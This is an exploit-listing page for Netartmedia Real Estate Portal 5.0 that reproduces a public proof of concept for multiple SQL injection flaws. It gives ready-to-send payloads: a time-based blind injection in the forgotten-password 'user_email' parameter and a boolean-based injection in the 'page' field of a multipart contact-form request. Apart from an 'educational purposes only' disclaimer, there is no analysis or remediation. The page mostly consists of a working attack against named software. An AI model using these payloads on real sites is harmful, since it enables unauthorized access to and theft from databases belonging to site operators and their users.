Netartmedia real estate portal 5.0 sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-19 | Type : webapps | Platform : php
This exploit / vulnerability Netartmedia real estate portal 5.0 sql injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection
# Date: 19.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/realestate/
# Demo Site: https://www.phpscriptdemos.com/realestate/
# Version: 5.0
# Tested on: Kali Linux
# CVE: N/A
# Description: The real estate portal software is made to be
multi-language, the main site can show multiple languages and let the site
visitors choose their preferred language.

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: user_email (POST)
Payload:
ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z'
OR SLEEP(5)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/index.php
Parameter: MULTIPART page ((custom) POST
Payload:
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="SubmitContact"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="code"

94102
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="email"

sample@email.tst
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="message"

20
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="name"

${alpharand}
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="page"

en_Contact-2228' OR 3801=3801-- eISZ
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="phone"

555-666-0606
------WebKitFormBoundaryYUBPFrrBhV4S4pf0
Content-Disposition: form-data; name="subject"

1
------WebKitFormBoundaryYUBPFrrBhV4S4pf0--